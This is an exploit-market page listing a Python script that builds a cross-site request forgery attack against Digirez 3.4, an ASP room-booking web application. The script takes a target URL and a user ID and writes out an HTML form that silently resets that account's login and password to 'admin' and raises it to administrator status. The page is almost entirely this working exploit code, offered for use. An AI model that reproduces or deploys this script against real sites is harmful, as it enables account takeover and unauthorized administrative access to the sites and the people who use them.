[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Digirez 3.4 - Cross-Site Request Forgery (Update Admin) Exploit

Author
Ihsan Sencan
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-28568
Category
web applications
Date add
18-09-2017
Platform
asp
#!/usr/local/bin/python
# # # # # 
# Exploit Title: Digirez 3.4 - Cross-Site Request Forgery (Update User & Admin)
# Dork: N/A
# Date: 18.09.2017
# Vendor Homepage: http://www.digiappz.com/
# Software Link: http://www.digiappz.com/index.asp
# Demo: http://www.digiappz.com/room/index.asp
# Version: 3.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
import os
import urllib
 
if os.name == 'nt':
        os.system('cls')
else:
    os.system('clear')
 
def csrfexploit():
 
    e_baslik = '''
################################################################################
        ______  _______ ___    _   __   _____ _______   ___________    _   __ 
       /  _/ / / / ___//   |  / | / /  / ___// ____/ | / / ____/   |  / | / / 
       / // /_/ /\__ \/ /| | /  |/ /   \__ \/ __/ /  |/ / /   / /| | /  |/ /
     _/ // __  /___/ / ___ |/ /|  /   ___/ / /___/ /|  / /___/ ___ |/ /|  /
    /___/_/ /_//____/_/  |_/_/ |_/   /____/_____/_/ |_/\____/_/  |_/_/ |_/
   
                                 WWW.IHSAN.NET                               
                               ihsan[@]ihsan.net                                     
                                       +                                     
                        Digirez 3.4 - CSRF (Update Admin)           
################################################################################
 
 
    '''
    print e_baslik
 
    url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://) \n Demo Site:http://digiappz.com/room: "))
    id = raw_input(" [+] Enter The User ID \n (Demo Site Admin ID:8565): ")
     
    csrfhtmlcode = '''
<html>
<body>
<form method="POST" action="%s/user_save.asp" name="user" >
<table align=center border=0>
  <tr>
    <td valign="middle">
         
        <table align=center border=0>
          <tr>
            <td align=center bgcolor="white">
                <table border=0 width=400 cellpadding=2 cellspacing=1>
                    <tr>
                        <td align=left colspan=2 bgcolor="cream">
                            <font color="red">User Update</font>
                        </td>
                    </tr>
                    <tr>
                        <td width=150>
                            <font>Choose Login*</font>
                        </td>
                        <td>
                            <INPUT type="text" name="login" size="30"value="admin">
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <font>Choose Password*</font>
                        </td>
                        <td>
                            <INPUT type="text" name="password" size="30"value="admin">
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <font>First Name*</font>
                        </td>
                        <td>
                            <INPUT type="text" name="first_name" size="30"value="admin">
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <font>Last Name*</font>
                        </td>
                        <td>
                            <INPUT type="text" name="last_name" size="30"value="admin">
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <font>Email*</font>
                        </td>
                        <td>
                            <INPUT type="text" name="email" size="30"value="admin@admin.com" onBlur="emailvalid(this);">
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <font>Address 1</font>
                        </td>
                        <td>
                            <INPUT type="text" name="address1" size="30"value="admin">
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <font>Address 2</font>
                        </td>
                        <td>
                            <INPUT type="text" name="address2" size="30"value="admin">
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <font>City / Town</font>
                        </td>
                        <td>
                            <INPUT type="text" name="city" size="30"value="admin">
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <font>ZIP / Postcode</font>
                        </td>
                        <td>
                            <INPUT type="text" name="postcode" size="30"value="admin">
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <font>State / County</font>
                        </td>
                        <td>
                            <INPUT type="text" name="county" size="30"value="admin">
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <font>Country</font>
                        </td>
                        <td>
                            <select name="country">
                                    <option value="1" selected> Turkey
                            </select>
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <font>Phone Number
                        <td>
                            <INPUT type="text" name="phone" size="30"value="admin">
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <font>Fax</font>
                        </td>
                        <td>
                            <INPUT type="text" name="fax" size="30"value="admin">
                        </td>
                    </tr>
                    <tr>
                        <td>
                            <font>Status</font>
                        </td>
                        <td>
                            <select name="status">
                                    <option value="1"> User</option>
                                    <option value="2" selected> Admin</option>
                           </select>
                        </td>
                    </tr>
                    <tr>
                        <td colspan=2 align=center>
                            <input type="hidden" name="id" value="%s">
                            <input type="submit" value="Update" onclick="return check()">
                        </td>
                    </tr>
                 </table>
              </td>
            </tr>
        </table>
     </td>
  </tr>
</table>
</form>
</body>
</html>
    ''' %(url, id)
 
    print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."
 
    print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")
    extension = ".html"
    name = raw_input(" Filename: ")
    filename = name+extension
    file = open(filename, "w")
 
    file.write(csrfhtmlcode)
    file.close()
    print(" [+] Your exploit is saved as %s")%filename
    print("")
 
csrfexploit()

#  0day.today [2024-11-15]  #